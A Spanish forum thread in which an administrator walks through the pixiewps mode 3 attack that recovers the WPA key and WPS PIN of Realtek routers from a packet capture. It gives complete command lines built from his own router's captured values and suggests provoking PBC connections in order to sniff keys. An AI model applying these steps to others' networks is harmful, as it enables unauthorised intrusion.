El libre pensamiento para un internet libre

No estas registrado.  

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#1 09-11-2017 18:50:00

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,066

Nuevo metodo pixiedust: ¡Crack PIN y llave WPA con fichero de captura!

Wiire implementa un nuevo método en pixiewps 1.3 para aprovechar la brecha pixie dust gracias al crack de nounce

NiaTUox.gif

¡La magia de pixie dust vuelve!

  Les voy a enseñar hoy como obtener el PIN WPS y la llave WPA con pixiewps y un fichero de captura.
Para realizar el crack se debe tener la ultima revisión de la versión 1.3 de pixiewps.
  Si usas kali linux es cuestión de actualizar tu sistema.
Si usas otra distribución Es cuestión de pasar por el repositorio Github de wiire (ver Pixiewps de wiire : la herramienta para el novedoso ataque Pixie Dust)
  Una vez que tenéis pixiewps 1.3 podréis ver en la ayuda en consola la opciones dedicadas a este nuevo método.

 Miscellaneous arguments:

   -7, --m7-enc      : Recover encrypted settings from M7 (only mode 3)
   -5, --m5-enc      : Recover secret nonce from M5       (only mode 3)

  Para saber más tecleamos

pixiewps --help

  Y esto es lo que podemos leer al final de la ayuda extendida

-7, --m7-enc      : Recover encrypted settings from M7 (only mode 3)

    Recover encrypted settings. It's the attribute in M7 that contains the current configuration of the Access Point (enrollee). This option WORKS (currently) only with mode 3 with a limited number of models and requires --pke, --pkr, --e-nonce, --r-nonce and --e-bssid

  [?] pixiewps -7 <enc> -e <pke> -r <pkr> -n <e-nonce> -m <r-nonce> -b <e-bssid> --mode 3

  De momento le método es solo para el modo 3 (chipset realtek)
  Se requiere un fichero de captura con M7 (ahí están los datos)
O sea: Debemos capturar el envió del PIN valido o una conexión WPS PBC
  Los datos a buscar en la captura son por un lado la PKE y la E-nounce (Enrolle-Punto de Acceso) y por otro la PKR y el R-nounce (Registar - cliente) 

  • PKE (argumento -e)y la E-nounce (argumento -n) se encuentran en el M1

  • PKR (argumento -r) y R-nounce (argumento -m) )se encuentran en el M2

  • Pondremos además el eSSID del routeur

  • Y pondremos los datos cifrados ( <enc>) )del M7.

Les dejo aquí un paquete de captura hecho con mi router con chip realtek para hacer practicas: pixierealtekalfa.zip
  Para extraer los datos usaremos wireshark porque es bonito y hace esto a la perfección.

M1: PKE y E-nounce

wireshark es súper practico y intuitivo. Tenéis a vuestra pantalla dividida en tres partes.
En la primera parte seleccionas el paquete M1 (1 en la captura que sigue) .
Aparece entonces el paquete en la segunda parte de la pantalla y desplegamos "EAP" (2).
Es como las muñecas rusas: Desplegamos el elemento siguiente (Expanded Type - 3) y llegamos a la E-nounce (4) y la llave publica (5)

m7crack_2.jpg

Hacemos click derecha en la nounce y "copiar valor"
Y empezamos a redactar a la linea pixiewps copiando y pegando el valor de los dos elementos con su argumento

pixiewps -n 20:30:c1:b4:6c:15:94:74:3e:0b:78:e6:5d:ac:2e:61 -e d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b

Con la famosa llave  publica única de realtek que empieza con d0.
Seguimos con el M2

M2: PKR y R-nounce

Lo mismo pero con el M2, pillando la registar nounce en lugar de la del enrolle

m7crack_3.jpg

Añadimos los valores a nuestra linea pixiewps

pixiewps -n 20:30:c1:b4:6c:15:94:74:3e:0b:78:e6:5d:ac:2e:61 -e d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b -m 88:9a:a5:b1:51:72:7a:6d:c0:ba:d7:6e:99:a9:f0:1c -r a5:bf:83:3a:ed:90:ff:f9:07:6a:0c:76:eb:e4:c1:a5:a6:33:16:54:09:d4:cc:43:c6:e2:93:46:58:56:15:26:c9:e6:d5:fe:8e:2d:bf:ba:8c:14:9f:c9:a4:08:ce:f5:a0:09:41:a3:38:10:d7:0d:b2:ce:ea:f4:7e:87:f9:6d:3b:5e:cd:e1:12:e3:29:54:4c:d1:2e:2c:46:21:3f:63:52:e6:7f:35:13:1c:00:0b:70:d9:ef:c9:ee:2d:7c:37:91:28:a3:9d:53:ca:c9:53:c9:2a:b0:86:8e:6d:3a:d1:ad:d2:ac:09:ca:f2:ee:33:f0:5d:20:ae:06:6f:bf:a4:32:2e:3b:ee:1c:53:8c:7c:de:23:aa:1b:a9:a0:ec:ac:11:4f:fd:6d:9c:bf:c6:8d:53:0e:9d:0f:d7:8a:c1:25:4d:3b:9c:d6:91:ce:43:2b:cd:4d:cc:ca:c8:2a:80:6c:53:ed:45:34:00:05:e9:95:02:c5:5a:9c:a8:75:77:45 
M7: Datos cifrados

Hacemos lo de la muñecas rusas y tenemos a la cadena en el parámetro "Encripted datas".

m7crack_4.jpg

Copiamos el valor que pegamos después -7  y estamos listos (no olvidarse de añadir -b y el bSSID así que --mode 3 también wink )

pixiewps -n 20:30:c1:b4:6c:15:94:74:3e:0b:78:e6:5d:ac:2e:61 -e d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b -m 88:9a:a5:b1:51:72:7a:6d:c0:ba:d7:6e:99:a9:f0:1c -r a5:bf:83:3a:ed:90:ff:f9:07:6a:0c:76:eb:e4:c1:a5:a6:33:16:54:09:d4:cc:43:c6:e2:93:46:58:56:15:26:c9:e6:d5:fe:8e:2d:bf:ba:8c:14:9f:c9:a4:08:ce:f5:a0:09:41:a3:38:10:d7:0d:b2:ce:ea:f4:7e:87:f9:6d:3b:5e:cd:e1:12:e3:29:54:4c:d1:2e:2c:46:21:3f:63:52:e6:7f:35:13:1c:00:0b:70:d9:ef:c9:ee:2d:7c:37:91:28:a3:9d:53:ca:c9:53:c9:2a:b0:86:8e:6d:3a:d1:ad:d2:ac:09:ca:f2:ee:33:f0:5d:20:ae:06:6f:bf:a4:32:2e:3b:ee:1c:53:8c:7c:de:23:aa:1b:a9:a0:ec:ac:11:4f:fd:6d:9c:bf:c6:8d:53:0e:9d:0f:d7:8a:c1:25:4d:3b:9c:d6:91:ce:43:2b:cd:4d:cc:ca:c8:2a:80:6c:53:ed:45:34:00:05:e9:95:02:c5:5a:9c:a8:75:77:45 -7 0d:d8:fc:a1:20:9d:b2:c0:64:62:cd:0f:46:62:69:31:ce:4c:35:ff:e2:db:5f:0b:26:47:cf:74:9a:a8:47:f1:2c:b8:1f:3f:7d:66:98:75:78:e4:d6:24:bb:c7:d8:16:03:05:4e:8c:e4:b7:47:fe:f5:50:36:e6:8d:6f:17:3b:6b:fa:2f:4c:62:86:00:30:ce:06:39:ee:c6:8c:30:5a:7c:42:49:8d:e8:b9:75:03:f6:d7:b6:66:49:99:82:b2:5e:f1:28:b2:b4:0c:2b:8b:d6:f4:5e:ad:02:44:f9:34 -b 00:c0:ca:78:b1:37 -b 00:c0:ca:78:b1:37 --mode 3

Obtenemos la llave WPA al instante. cool

m7crack_5.jpg

¿Y el PIN?
Pues ahora tenemos a la authkey crackeada.
Recordar: la authkey es el unico elemento que no podemos encontrar en una captura.
Lo que necesitamos para conocer el PIN son E-Hash1 y E-Hash2 que tenemos en el M3.

m7crack_6.jpg

La PKE y PKR las hemos recogido previamente y acabamos de crackear la authkey con el nuevo método y que tenemos en consola,
Así que puedo hacer mi ataque pixiedust "normal" y conocer el PIN

m7crack_8.jpg

  La originalidad del método es que permite importar pixiedust al modo PBC.
Si se "provoca" una conexión PBC sobre un PA realtek, basta con esnifar el trafico para recoger la llave.
Hasta ahora podíamos hacer el ataque "Rogue PBC" con el hostbase de Koala para atacarse al WPS PBC.
Tenemos ahora a otra forma de aprovechar este protocolo reputado seguro para crackear una red (cuando el PA lleva un chip realtek). smile
  Para los amantes de las mates y de la precisión expondré estos días en un segundo post la mecánica empelada para romper el cifrado del M7.

Desconectado

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#2 09-11-2017 19:33:15

crash
Usuario

Registrado: 25-10-2017
Mensajes: 751

Re: Nuevo metodo pixiedust: ¡Crack PIN y llave WPA con fichero de captura!

guay, este cada vez se pone mas interesante. jejejejejeje

te dejado un mensaje por email, mandado desde aquí. kcdtv

Desconectado

#3 09-11-2017 19:56:18

juandiegomu
Usuario

Registrado: 31-05-2015
Mensajes: 71

Re: Nuevo metodo pixiedust: ¡Crack PIN y llave WPA con fichero de captura!

kcdtv muy interesante,un saludo

Desconectado

#4 09-11-2017 23:43:02

USUARIONUEVO
Usuario

Registrado: 07-07-2015
Mensajes: 285

Re: Nuevo metodo pixiedust: ¡Crack PIN y llave WPA con fichero de captura!

Hay que precisar que no basta la version 1.3  "estable"  , por que yo la tengo , y no vienen estas nuevas opciones.

Hay que pasar por git, si o si.

Desconectado

#5 10-11-2017 14:31:44

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,066

Re: Nuevo metodo pixiedust: ¡Crack PIN y llave WPA con fichero de captura!

Gracias por esta corrección. Con tanto tests y versiones me hago un lío. big_smile Saludos smile

Desconectado

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

Temas similares

Tema Respuestas Vistas Ultimo mensaje
45 6279 Hoy 03:41:05 por skynet777
Asrock 775i945GZ por josep345
7 139 Ayer 21:40:04 por crash
23 1347 Ayer 21:31:05 por kcdtv
14 304 Ayer 21:07:36 por josep345
1 45 Ayer 20:53:23 por josep345

Pie de página

Información del usuario

Ultimo usuario registrado: crow
Usuarios registrados conectados: 0
Invitados conectados: 9

Estadisticas de los foros

Número total de usuarios registrados: 1,044
Número total de temas: 1,080
Número total de mensajes: 10,707

Máx. usuarios conectados: 69 el 15-10-2017 09:23:21